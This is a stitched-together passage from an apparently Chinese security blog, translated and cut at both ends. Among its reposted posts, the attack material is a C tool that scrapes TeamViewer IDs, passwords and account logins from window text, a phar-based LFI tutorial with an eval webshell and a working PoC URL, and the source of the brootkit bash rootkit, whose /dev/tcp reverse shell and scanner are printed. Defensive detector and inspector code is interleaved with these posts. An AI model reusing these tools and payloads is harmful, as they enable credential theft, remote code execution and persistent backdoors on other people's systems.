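{"EventID": 13, "EventType": "SetValue", "Image": "C:\\Windows\\System32\\svchost.exe", "User": "NT AUTHORITY\\SYSTEM", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\EnableICMPRedirect", "Details": "DWORD (0x00000000)"}
{"EventID": 13, "EventType": "SetValue", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "User": "CORP\\hardening-svc", "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential", "Details": "DWORD (0x00000000)"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\reg.exe", "User": "CORP\\jdoe", "CommandLine": "reg query HKLM\\SYSTEM"}
"""


def parse_events(text):
    """One JSON object per line; blank lines are skipped."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def wdigest_enable_alerts(events):
    """Registry writes that switch the WDigest plaintext cache on.  Only
    SetValue events on ...\\WDigest\\UseLogonCredential whose new data is a
    DWORD other than 0 (or unparsable) are reported; a write of 0 is the
    hardening direction and is left alone."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 13 or ev.get("EventType") != "SetValue":
            continue
        if not TARGET_RE.search(ev.get("TargetObject", "")):
            continue
        m = DETAILS_RE.search(ev.get("Details", ""))
        value = int(m.group(1), 16) if m else None
        if value is None or value != 0:
            alerts.append({"user": ev.get("User"), "image": ev.get("Image"), "value": value})
    return alerts


def plaintext_cached(use_logon_credential, is_81_or_later, has_kb2871997):
    """Interpret an audited UseLogonCredential value (None when the entry
    is absent) with the defaults described in the post: absent reads as 0
    on Windows 8.1 and as 1 on pre-8.1 hosts that have KB2871997; without
    the hotfix pre-8.1 hosts cache plaintext regardless of the value."""
    if not is_81_or_later and not has_kb2871997:
        return True
    if use_logon_credential is not None:
        return use_logon_credential != 0
    return not is_81_or_later


if __name__ == "__main__":
    for a in wdigest_enable_alerts(parse_events(SAMPLE_LOG)):
        print("ALERT: WDigest plaintext caching enabled by %s via %s" % (a["user"], a["image"]))
```

Pairing the alert with Event ID 1 for the same image and user (the fourth record shows the shape) gives the command line that made the write; that correlation is left to the SIEM here.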

Retrieving the account and password from a running TeamViewer instance

Published: June 10, 2015 // Categories: ops work, work log, code study, VC/C/C++, reposted articles

Dumps TeamViewer ID,Password and account settings from a running TeamViewer instance by enumerating child windows.

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <cstdio>    // printf
#include <cstring>   // strstr
#include <iostream>
#pragma comment( lib, "kernel32" )
#pragma comment( lib, "user32" )
 
int status = 0;
 
BOOL CALLBACK EnumMainTVWindow(HWND hwnd, LPARAM lParam)
{
        const int BufferSize = 1024;
        char BufferContent[BufferSize] = "";
        SendMessage(hwnd, WM_GETTEXT, (WPARAM)BufferSize, (LPARAM)BufferContent);
       
        if (status == 1)
        {
                printf("%s\n", BufferContent);
                status = 0;
        }
 
        if (strstr(BufferContent, "Allow Remote Control") != NULL)
        {
                status = 1;
                printf("TeamViewer ID: ");
        }
       
        if (strstr(BufferContent, "Please tell your partner") != NULL)
        {
                status = 1;
                printf("TeamViewer PASS: ");
        }
 
        return 1;
}
 
BOOL CALLBACK EnumAccountWindow(HWND hwnd, LPARAM lParam)
{
        const int BufferSize = 1024;
        char BufferContent[BufferSize] = "";
        SendMessage(hwnd, WM_GETTEXT, (WPARAM)BufferSize, (LPARAM)BufferContent);
       
        if (status == 1)
        {
                printf("%s\n", BufferContent);
                status = 0;
        }
 
        if (strstr(BufferContent, "E-mail") != NULL)
        {
                status = 1;
                printf("E-mail: ");
        }
       
        if (strstr(BufferContent, "Password") != NULL)
        {
                status = 1;
                printf("Password: ");
        }
 
        return 1;
}
 
 
int main()
{
        HWND hwndTeamViewer = FindWindow(NULL, "TeamViewer");
 
        if (hwndTeamViewer)
        {
                EnumChildWindows(hwndTeamViewer, EnumMainTVWindow, 0);
        }
       
       
        HWND hwndAccount = FindWindow(NULL, "Computers & Contacts");
 
        if (hwndAccount)
        {
                EnumChildWindows(hwndAccount, EnumAccountWindow, 0);
        }
 
       
        return 0;
}
C:\tools\Projects>TeamViewer_Dump.exe
TeamViewer ID: 606 151 261
TeamViewer PASS: 3239
E-mail: hacked@account.com
Password: FooPassword123

C:\tools\Projects>

php phar LFI

Published: June 9, 2015 // Categories: PHP, code study, reposted articles

0x01. What is phar

A phar archives files into a single package.
Packaging a module's files into one phar makes moving the module as a whole easy: just move the phar file and include it in the other environment to use it.
It is similar to Java's .jar files.
Since PHP 5.3 it has been a C extension of PHP that is installed by default.

0x02. Creating a phar file

The phar.readonly setting must be Off; when it is On, phar archives are read-only and cannot be written.

makephar.php

<?php

try{
    $p = new Phar("my.phar", 0, 'my.phar');
} catch (UnexpectedValueException $e) {
    die('Could not open my.phar');
} catch (BadMethodCallException $e) {
    echo 'technically, this cannot happen';
}

$p->startBuffering();
$p['file1.txt'] = 'file1'; 
$p['file2.txt'] = 'file2';
$p['file3.txt'] = 'file3';
$p['shell.php'] = '<?php phpinfo(); eval($_POST[x]); ?>';

// use my.phar
echo file_get_contents('phar://my.phar/file2.txt');  // echo file2

// make a file named my.phar
$p->setStub("<?php
    Phar::mapPhar('myphar.phar');  
__HALT_COMPILER();");

$p->stopBuffering();

?>

The code above generates a my.phar file and prints the string file2.

my.phar contains the four files file1.txt, file2.txt, file3.txt and shell.php. Naturally, these four files do not actually exist on disk.

Note: these files cannot be accessed directly over HTTP, but they can be used by PHP functions such as include and file_get_contents.

0x03. Using the phar

In the same directory as makephar.php, create a callphar.php that uses the phar-specific stream format.

<?php
include 'phar://my.phar/shell.php';
?>

Requesting callphar.php calls shell.php.

Note: phar files are not tied to a file name: my.phar can be renamed to anything, e.g. aaa.bbb.

callphar.php

<?php
include 'phar://aaa.bbb/shell.php';
?>


0x04. LFI vulnerability code and exploitation

upload.php

<?php

if(isset($_POST['submit'])){
    $upload_name = $_FILES['file']['name'];
    $tempfile = $_FILES['file']['tmp_name'];
    $upload_ext = trim(get_extension($upload_name)); 

    $savefile = RandomString() . '.txt';
    if ($upload_ext == 'txt') {
            if(move_uploaded_file($tempfile,$savefile)) {
                die('Success upload. FileName: '.$savefile);
            }
            else {
                die('Upload failed..');
            }
    }
    else {
        die('You are not a txt file..');
    }

}
function get_extension($file){
    return strtolower(substr($file, strrpos($file, '.')+1));    
}

function RandomString()
{
    $characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $randstring = "";
    for ($i = 0; $i < 16; $i++) {
        $randstring .= $characters[rand(0, strlen($characters)-1)];
    }
    return $randstring;
}

// make a lfi vulnerability
$file = $_REQUEST['file'];
if ($file != '') {
    $inc = sprintf("%s.php", $file); // only php file can be included
    include($inc);
}
?>


<html>
    <body>
        <form method="post" action="#" enctype="multipart/form-data">
            <input type="file" name="file" value=""/>
            <input type="submit" name="submit" value="upload"/>
        </form>
    </body>
</html>

The code above only allows uploading txt files, and can include files with the php extension.

Exploitation:
Rename the my.phar generated by makephar.php to phar.txt and upload it.


So the PoC is:
http://localhost/pentest/web200/upload.php?file=phar://S9EvthZuJI1TC4u5.txt/shell
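The upload handler above trusts the extension, which is exactly the check a renamed phar satisfies. As an added example (not part of the original post), the Python below is an inspector that recognises a phar by content, following the manifest layout documented on the PHP manual's "Phar file format" page, and lists the embedded names so an upload scanner can reject archives carrying .php entries. build_sample_phar() constructs a minimal unsigned archive as test input; the reader ignores signatures and never decompresses or executes anything.

```python
import struct
import zlib

HALT = b"__HALT_COMPILER();"
COMPRESSED_MASK = 0x3000      # per-entry flags: 0x1000 gzip, 0x2000 bzip2


def parse_phar_manifest(data):
    """Parse the little-endian binary manifest that follows the PHP stub.
    Returns a list of entries {name, size, csize, crc32, flags, offset} or
    None when the bytes do not look like a phar.  Nothing is executed."""
    pos = data.find(HALT)
    if pos < 0:
        return None
    pos += len(HALT)
    if data[pos:pos + 3] == b" ?>":           # optional closing tag after the halt
        pos += 3
    if data[pos:pos + 2] == b"\r\n":           # optional line break
        pos += 2
    elif data[pos:pos + 1] == b"\n":
        pos += 1
    try:
        manifest_len, nfiles, _api, _flags, alias_len = struct.unpack_from("<IIHII", data, pos)
        start = pos + 4                         # manifest_len counts the bytes after itself
        pos += 18 + alias_len                   # skip the alias
        (meta_len,) = struct.unpack_from("<I", data, pos)
        pos += 4 + meta_len                     # skip serialized global metadata
        entries = []
        for _ in range(nfiles):
            (name_len,) = struct.unpack_from("<I", data, pos)
            pos += 4
            name = data[pos:pos + name_len].decode("utf-8", "replace")
            pos += name_len
            size, _mtime, csize, crc, flags, fmeta_len = struct.unpack_from("<IIIIII", data, pos)
            pos += 24 + fmeta_len               # skip serialized per-file metadata
            entries.append({"name": name, "size": size, "csize": csize,
                            "crc32": crc, "flags": flags})
    except struct.error:
        return None                             # truncated: not a usable manifest
    if pos - start != manifest_len or nfiles == 0:
        return None
    for e in entries:                           # contents follow the manifest, in order
        e["offset"] = pos
        pos += e["csize"]
    return entries


def entry_content(data, entry):
    return data[entry["offset"]:entry["offset"] + entry["csize"]]


def crc_ok(data, entry):
    """CRC32 check for uncompressed entries; returns None for compressed
    ones, which an inspector should not inflate without size limits."""
    if entry["flags"] & COMPRESSED_MASK:
        return None
    return (zlib.crc32(entry_content(data, entry)) & 0xFFFFFFFF) == entry["crc32"]


def suspicious_phar_entries(data, exts=(".php", ".phtml", ".phar", ".inc")):
    """Names of embedded files PHP would execute if included via phar://."""
    entries = parse_phar_manifest(data) or []
    return [e["name"] for e in entries if e["name"].lower().endswith(exts)]


def build_sample_phar(files, alias=b"my.phar"):
    """Construct a minimal unsigned phar as test input (constructed here;
    archives written by PHP also end with a signature block, which the
    reader above does not consult)."""
    stub = b"<?php __HALT_COMPILER(); ?>\r\n"
    entries, contents = b"", b""
    for name, body in files:
        entries += struct.pack("<I", len(name)) + name
        entries += struct.pack("<IIIIII", len(body), 0, len(body),
                               zlib.crc32(body) & 0xFFFFFFFF, 0, 0)
        contents += body
    body = (struct.pack("<IHI", len(files), 0x1100, 0)        # count, api version field, flags
            + struct.pack("<I", len(alias)) + alias
            + struct.pack("<I", 0)                            # no global metadata
            + entries)
    return stub + struct.pack("<I", len(body)) + body + contents


if __name__ == "__main__":
    sample = build_sample_phar([(b"file1.txt", b"file1"), (b"shell.php", b"<?php phpinfo(); ?>")])
    print("embedded:", [e["name"] for e in parse_phar_manifest(sample)])
    print("would reject for:", suspicious_phar_entries(sample))
```

Because the check keys on the stub and manifest rather than the file name, renaming my.phar to phar.txt (the step in the exploitation above) changes nothing for it; an upload handler that runs this on every file, regardless of extension, closes the gap the extension check leaves open.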


0x05. References

http://blog.csdn.net/yonggang7/article/details/24142725
http://drops.wooyun.org/papers/4544

PentestBox: a Windows-based penetration testing platform

Published: June 7, 2015 // Categories: work log, windows, reposted articles

Welcome to PentestBox Tools List Website!
Here you will find list of the tools which are inside PentestBox and how to use them. 
You can see list of tools of particular category using the left sidebar.

Suppose you want to use SQLMap: you can find its description below in the Web Application Scanner section, and you will find something like the following

  cmd.exe (C:\Users\Aditya Agrawal\Desktop)
  $sqlmap

The console above with sqlmap in it shows that if you need to use SQLMap, sqlmap is the alias for it. If you are not familiar with the tool and its functions, type something like sqlmap -h on the console; it will display all the possible functions of that tool, sqlmap in our case.

To keep things short, below are only the aliases of the respective tools.
I hope you will enjoy using PentestBox :)

Web Vulnerability Scanners

  • Burp Suite - Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. 
    Author: PortsWigger
    Alias: burp

  • Commix - Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. 
    Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)
    Alias: commix

  • fimap - fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It's currently under heavy development but it's usable. 
    Author: Iman Karim 
    License: GPLv2
    Alias: fimap

  • Grabber - Grabber is a web application scanner. Basically it detects some kind of vulnerabilities in your website. Grabber is simple, not fast but portable and really adaptable. This software is designed to scan small websites such as personals, forums etc. absolutely not big application: it would take too long time and flood your network. 
    Author: Romain Gaucher 
    License: BSD
    Alias: grabber

  • Golismero - GoLismero is an open source framework for security testing. It's currently geared towards web security, but it can easily be expanded to other kinds of scans.
    Author: Daniel García, Mario Vilas, Raúl Requero
    License: GPLv2
    Alias: golismero
    Example, run from C:\PentestBox\bin\WebApplications\golismero: golismero.bat scan pentestbox.com

  • IronWasp - Find security issues on your website automatically using IronWASP, one of the world's best web security scanners. Here are some reasons why IronWASP is great:
    • It's Free and Open source
    • GUI based and very easy to use, no security expertise required
    • Powerful and effective scanning engine
    • Supports recording Login sequence
    • Checks for over 25 different kinds of well known web vulnerabilities
    • False Negatives detection support
    • Industry leading built-in scripting engine that supports Python and Ruby

    Author: Lavakumar Kuppan
    Alias: ironwasp

  • jSQL - jSQL Injection is a lightweight application used to find database information from a distant server. jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris). 
    Author: ron190 
    License: GPLv3
    Alias: jSQL

  • Nikto - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. 
    Author: Cirt.net 
    License: GPLv3
    Alias: nikto

  • PadBuster - Automated script for performing Padding Oracle attacks. 
    Author: Brian Holyfield, Gotham Digital Science 
    License: Reciprocal Public License 1.5
    Alias: padbuster

  • SqlMap - sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. 
    Author: Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar 
    License: GPLv2
    Alias: sqlmap

  • Vega - Vega is a free and open source scanner and testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows. 
    Author: Subgraph 
    License: Eclipse Public License 1.0
    Alias: vega

  • Wpscan - WPScan is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues. 
    Author: The WPScan Team 
    License: WPScan Public Source License
    Alias: wpscan

  • OWASP Xenotix XSS Exploit FrameWork - OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be. It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks. 
    Author: Ajin Abraham 
    License: Creative Commons Attribution-ShareAlike 3.0
    $xenotix

  • Yasuo - Yasuo is a ruby script that scans for vulnerable 3rd-party web applications. While working on a network security assessment (internal, external, redteam gigs etc.), we often come across vulnerable 3rd-party web applications or web front-ends that allow us to compromise the remote server by exploiting publicly known vulnerabilities. Some of the common & favorite applications are Apache Tomcat administrative interface, JBoss jmx-console, Hudson Jenkins and so on. 
    License: GPLv3
    $yasuo

  • Zaproxy - The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen testers toolbox. 
    Author: OWASP.org

    There is some integration issue with Zaproxy and PentestBox. So you have to start it manually by opening the zap.bat file in PentestBox_Directory/bin/WebApplications/ZAP_2.4.0/. We will surely try to fix it sooner.

Web Applications Proxies

  • Burp Suite - Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. 
    Author: Portswigger
    $burp

  • Zaproxy - The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen testers toolbox. 
    Author: OWASP.org

    There is some integration issue with Zaproxy and PentestBox. So you have to start it manually by opening the zap.bat file in PentestBox_Directory/bin/WebApplications/ZAP_2.4.0/. We will surely try to fix it sooner.

Web Crawlers

  • Dir Buster - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. 
    Author: OWASP.org 
    License: Apache 2.0
    $dirbuster

  • Burp Suite - Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. 
    Author: Portswigger
    $burp

On the problem of text overlapping: method provided


brootkit: a backdoor written as a shell script

Published: June 7, 2015 // Categories: work log, ops work, linux, code study, reposted articles // 1 Comment

I was having dinner tonight when XX sent me a message asking me to look at brootkit and see how portable it is. I went through each file and found that its core function is a reverse shell, using bash's ability to open TCP connections. Apart from brootkit.sh, the other scripts are basically there to make it easier for beginners to use; the main job of brootkit.sh itself is to hide the whole set of scripts and config files according to the rootkit's config file. Portability is not great, because bash may well not be present on the target.

Opening the link, the description reads like this: it is a rootkit tool written as a bash script.

It can do these things:

more hidable ability against administrator or hids.
su passwd thief.
hide file and directories.
hide process.
hide network connections.
connect backdoor.
multi-thread port scanner.
http download.
OK, let's check it out first

MacOS:tmp cc$ svn co https://github.com/cloudsec/brootkit
A    brootkit/branches
A    brootkit/trunk
A    brootkit/trunk/.bdrc
A    brootkit/trunk/README
A    brootkit/trunk/README.md
A    brootkit/trunk/bashbd.sh
A    brootkit/trunk/br.conf
A    brootkit/trunk/br_config.sh
A    brootkit/trunk/brdaemon.sh
A    brootkit/trunk/brget.sh
A    brootkit/trunk/brootkit.sh
A    brootkit/trunk/brscan.sh
A    brootkit/trunk/install.sh
A    brootkit/trunk/uninstall.sh
Checked out revision 35.
MacOS:tmp cc$

As you can see, there is one config file and 8 sh scripts; according to the README they should be bash scripts.

Let's look at the scripts one by one, starting with bashbd.sh; I have added comments.

#!/bin/bash

BR_ROOTKIT_PATH="/usr/include/..."

. $BR_ROOTKIT_PATH/br_config.sh

function br_connect_backdoor()
{
    local target_ip=$br_remote_host
    local target_port=$br_remote_port
    local sleep_time=$br_sleep_time

    while [ 1 ]
    do  
        MAX_ROW_NUM=`stty size|cut -d " " -f 1`
        MAX_COL_NUM=`stty size|cut -d " " -f 2`
        {
        PS1='[\A j\j \u@\h:t\l \w]\$';export PS1
        exec 9<> /dev/tcp/$target_ip/$target_port # this needs bash support: open file descriptor 9 and attach it to a TCP connection to the given ip and port
        [ $? -ne 0 ] && exit 0 || exec 0<&9;exec 1>&9 2>&1 # check whether the descriptor opened; exit on failure, otherwise redirect the current shell's stdin, stdout and stderr to it
        if type python >/dev/null;then # if python is available, use it to spawn bash for the reverse shell
            export MAX_ROW_NUM MAX_COL_NUM
            python -c 'import pty; pty.spawn("/bin/bash")'
        else
            /bin/bash --rcfile $BR_ROOTKIT_PATH/.bdrc --noprofile -i # without python, run bash directly; any shell could be run here
        fi
        }&
        wait

        sleep $((RANDOM%sleep_time+sleep_time))
    done
}

br_load_config $BR_ROOTKIT_PATH/br.conf
br_connect_backdoor

From the man page, the rcfile option means the following

--rcfile file
Execute commands from file instead of the standard personal initialization file ~/.bashrc if the shell is interactive (see INVOCATION below).

And the .bdrc file only prints a welcome string

#!/bin/bash

echo -e "\033[31m\t\t\t\twelcome to brootkit\033[0m\033[32m"

br.conf defines the files and processes to hide, plus the target ip and port for the reverse shell

#brootkit config file.
#
HIDE_PORT       8080,8899
HIDE_FILE       br.conf,bashbd.sh,brootkit,.bdrc,brdaemon
HIDE_PROC       bashbd,brootkit,pty.spawn,brdaemon
REMOTE_HOST     localhost
REMOTE_PORT     8080
SLEEP_TIME      60

Now br_config.sh: it defines three functions and a number of array variables, used to load and display the parameters of the config file

#!/bin/bash

declare -a br_hide_port
declare -a br_hide_file
declare -a br_hide_proc
declare -a br_remote_host
declare -a br_remote_port
declare br_sleep_time

function br_load_config()
{
        local arg1 arg2 line

        while read line
        do
                [ "${line:0:1}" == "#" -a -z "$line" ] && continue

                arg1=`echo $line | cut -d " " -f 1`
                arg2=`echo $line | cut -d " " -f 2`

                case $arg1 in
                        "HIDE_PORT")
                                br_hide_port=$arg2;;
                        "HIDE_FILE")
                                br_hide_file=$arg2;;
                        "HIDE_PROC")
                                br_hide_proc=$arg2;;
                        "REMOTE_HOST")
                                br_remote_host=$arg2;;
                        "REMOTE_PORT")
                                br_remote_port=$arg2;;
                        "SLEEP_TIME")
                                br_sleep_time=$arg2;;
                esac
        done < $1
}

function display_array()
{
    declare -a arg_tmp=$1
    local arg old_ifs

    old_ifs=$IFS; IFS=","
    for arg in ${arg_tmp[@]}
    do
        echo $arg
    done
    IFS=$old_ifs
}

function br_display_config()
{
        echo -e "HIDE_PORT:"
    display_array $br_hide_port
        echo -e "HIDE_FILE:"
    display_array $br_hide_file
        echo -e "HIDE_PROC:"
    display_array $br_hide_proc
        echo -e "REMOTE_HOST:"
    display_array $br_remote_host
        echo -e "REMOTE_PORT:"
    display_array $br_remote_port
        echo -e "SLEEP_TIME:"
    echo $br_sleep_time
}

According to the man page, declare -a means declaring an array

An array is created automatically if any variable is assigned to using
the syntax name[subscript]=value. The subscript is treated as an
arithmetic expression that must evaluate to a number greater than or
equal to zero. To explicitly declare an array, use declare -a name
(see SHELL BUILTIN COMMANDS below). declare -a name[subscript] is also
accepted; the subscript is ignored. Attributes may be specified for an
array variable using the declare and readonly builtins. Each attribute
applies to all members of an array.

This is the content of brget.sh, a script written in bash that sends a GET request. It uses the bash feature of initiating a TCP connection and opening a file descriptor attached to that connection

#!/bin/bash

declare remote_host
declare remote_port
declare remote_file
declare remote_file_len

function sock_read()
{
    local line tmp

    read -u 9 -t 5 line
    if ! echo $line|grep -e "200 OK" >/dev/null; then
        echo $line
        rm -f $remote_file
        socket_close
        exit
    else
        echo "response 200 ok."
    fi

    while read -u 9 -t 5 line
    do
        if [ ${#line} -eq 1 ]; then
            break
        fi

        tmp=`echo $line|cut -d " " -f 1`
        if [ "$tmp" == "Content-Length:" ]; then
            remote_file_len=`echo $line|cut -d " " -f 2`
        fi
    done

    echo "length: $remote_file_len"
    while read -u 9 -t 5 line
    do
        echo -e "$line" >>$remote_file
    done
}

function sock_write()
{
    local buf

    buf="GET /$3 http/1.0\r\nHost: $1:$2\r\n"
    echo -e $buf >&9
    [ $? -eq 0 ] && echo "send http request ok." || echo "send http request failed."
}

function socket_create()
{
    exec 9<> /dev/tcp/$1/$2
    [ $? -eq 0 ] && echo "connect to $1:$2 ok." || echo "connect to $1:$2 failed."
}

function socket_close()
{
    exec >&9-
    [ $? -ne 0 ] && echo "close socket failed."
}

function parse_url()
{
    local url=$1

    url=${url#http://}
    remote_file=${url#*/}
    remote_host=`echo $url | awk -F '/' '{print $1}'`
    remote_port=`echo $remote_host | awk -F ':' '{print $2}'`
    remote_host=`echo $remote_host | awk -F ':' '{print $1}'`

    [ "$remote_port" == "" ] && remote_port=80
}

function file_init()
{
    [ -f $remote_file ] && rm -f $remote_file || touch $remote_file
}

function display_start()
{
    local tmp

    tmp=`date +'%F %T'` 
    tmp="--$tmp-- $1"
    echo -e $tmp
}

function display_finsh()
{
    local tmp

    tmp=`date +'%F %T'` 
    tmp="\n--$tmp-- - $remote_file saved $remote_file_len"
    echo -e "$tmp"
}

function wget_usage()
{
    echo -e "$0 <url>\n"
    echo "exp:"
    echo "$0 http://www.baidu.com/index.html"
    echo "$0 http://www.baidu.com:80/index.html"
}

function main()
{
    if [ $# -eq 0 ]; then
        wget_usage $1
        exit
    fi

    parse_url $@

    file_init
    display_start $1
    socket_create $remote_host $remote_port
    sock_write $remote_host $remote_port $remote_file
    sock_read
    display_finsh
    socket_close
}

main $@

Using it looks like this

MacOS:trunk cc$ bash brget.sh http://g.cn
--2015-01-20 22:33:20-- http://g.cn
connect to g.cn:80 ok.
send http request ok.
HTTP/1.0 400 Bad Request
MacOS:trunk cc$

brscan.sh, as the name suggests, is a port scanner; looking at the code, it also uses bash's ability to open TCP connections

#!/bin/bash

declare br_remote_host="localhost"
declare -a br_ports
declare -a br_open_ports
declare br_port_num=0
declare br_curr_port_num=0
declare br_open_port_num=0
declare br_thread_num=0
declare br_timeout=2
declare br_logfile="brscan.log"
declare total_run_time
declare max_row_num

declare -a playx=('/' '|' '\\' '-')
declare playx_len=4

declare max_col_num=64
declare base_row=0
declare base_col=1
declare cur_col=2
declare total_port=10
declare cur_port=0

function br_run_play()
{
        local i x y tmp_col

        tmp_col=$((br_curr_port_num * max_col_num / br_port_num))

        i=$((max_row_num+1))
        [ $br_thread_num -gt $i ] && x=$i || x=$((br_thread_num+4))

        for ((i = 1; i < $tmp_col; i++))
        do
                y=$((base_col+i))
                [ $y -gt $max_col_num ] && break
                echo -ne "\033[${x};${y}H>\033[?25l"
        done
}

function br_play_init()
{
        local x y i

        i=$((max_row_num+1))
        [ $br_thread_num -gt $i ] && x=$i || x=$((br_thread_num+4))

        echo -ne "\033[${x};${base_col}H\033[33m[\033[0m"

        y=$((max_col_num+1))
        echo -ne "\033[${x};${y}H\033[33m]\033[0m"
}

function compute_run_time()
{
        local day hour min rtime

        day=$(($1/3600/24))
        hour=$(($1/3600))
        min=$(($1/60))

        if [ $min -eq 0 ]; then
                sec=$(($1%60))
        total_run_time="$sec s"
        else
                if [ $hour -eq 0 ]; then
                        sec=$(($1%60))
                        total_run_time="$min m $sec s"
                else
                        if [ $day -eq 0 ]; then
                                tmp=$(($1%3600))
                                min=$(($tmp/60))
                                sec=$(($tmp%60))
                                total_run_time="$hour h $min m $sec s"
                        else
                                # 86400 = 3600 * 24
                                tmp=$(($1%86400))
                                hour=$(($tmp/3600))
                                tmp1=$(($tmp%3600))
                                min=$(($tmp1/60))
                                sec=$(($tmp1%60))
                                total_run_time="$day d $hour h $min m $sec s"
                        fi


                fi
        fi
}

function get_run_time()
{
        local run_count local_hz run_time
    local start_time curr_time

    if [ -d "/proc/$1" ]; then
            run_count=`cat /proc/$1/stat | cut -d " " -f 22`
    else
        return 0
    fi

        local_hz=`getconf CLK_TCK`
        start_time=$(($run_count/$local_hz))

        curr_time=`cat /proc/uptime | cut -d " " -f 1 | cut -d "." -f 1`
        run_time=$((curr_time-start_time))

    return $run_time
}

function br_show_open_ports()
{
    local x y i

    get_run_time $$
    run_time=$?

    compute_run_time $run_time

    i=$((max_row_num+1))
    [ $br_thread_num -gt $i ] && x=$i || x=$((br_thread_num+4))

    y=$((max_col_num+3))
    printf "\033[${x};${y}H\033[32;1m %5d/%-5d\t$total_run_time\033[0m" \
        $br_curr_port_num $br_port_num

    x=$((x+2)); y=1
    printf "\033[${x};${y}H\033[32;1m%s: ${br_open_ports[*]}\033[0m" \
        $br_remote_host 
}

# $1 => remote host
# $2 => remote port
# $3 => thread_num
function thread_scan()
{
    local tport pid pidfile sock_fd
    local i j k m=0 run_time x

    mkdir -p .scan

    for ((i = 0; i < $3; i++))
    do
        {
        let "sock_fd=$2+$i"
        let "j=$2+$i+3"
        /bin/bash -c "exec $j<> /dev/tcp/$1/${br_ports[$sock_fd]}" 2>${br_ports[$sock_fd]}
        }&
        let "k=$2+$i"
        x=$((m+3))
        if [ $x -ge $max_row_num ]; then
             m=0;x=3
        else
            ((m++))
        fi
        printf "\033[${x};1H\033[33mthread<%-5d>\t\t--\t\tpid <%-5d>\t-->\t%-5d\033[?25l" \
            $i $! ${br_ports[$k]}
        echo ${br_ports[$k]} > ".scan/$!"
        [ $br_curr_port_num -ge $br_port_num ] && break || ((br_curr_port_num++))
    done

    sleep $br_timeout

    exec 2>&-
        for pid in `jobs -p`
        do
        get_run_time $pid
        run_time=$?
        [ $run_time -eq 0 ] && continue

                if [ $run_time -ge $br_timeout ]; then
                        kill -9 $pid >/dev/null 2>&1
            rm -f ".scan/$pid"
                fi
        done

    for ((i = 0; i < $3; i++))
    do
        let "sock_fd=$2+$i"
                if [ ! -s ${br_ports[$sock_fd]} ]; then
            for pid_file in `ls .scan`
            do
                tport=`cat ".scan/$pid_file"`
                if [ $tport -eq ${br_ports[$sock_fd]} ]; then
                    br_open_ports[$br_open_port_num]=${br_ports[$sock_fd]}
                    ((br_open_port_num++))
                fi
            done
                fi

        rm -f ${br_ports[$sock_fd]}
    done

    br_run_play
    br_show_open_ports
    rm -fr .scan
}

# $1 => remote host
# $2 => thread_num
function br_scan_port()
{
    local i

    for ((i = 0; i < $br_port_num; i+=$br_thread_num))
    do
        thread_scan $br_remote_host $i $br_thread_num
    done
}

function br_show_ports()
{
    local i

    for ((i = 0; i < $br_port_num; i++))
    do
        echo ${br_ports[$i]}
    done
}

function parse_port()
{
    local start_port end_port port

    start_port=`echo $1 | cut -d "-" -f 1`
    end_port=`echo $1 | cut -d "-" -f 2`

    for ((port=$start_port; port <= $end_port; port++))
    do
        br_ports[$br_port_num]=$port
        ((br_port_num++))
    done
    ((br_port_num--))
}

function br_parse_port()
{
    declare -a ports
    local tmp_ifs port

    tmp_ifs=$IFS; IFS=','; ports=$1

    for port in ${ports[@]}
    do
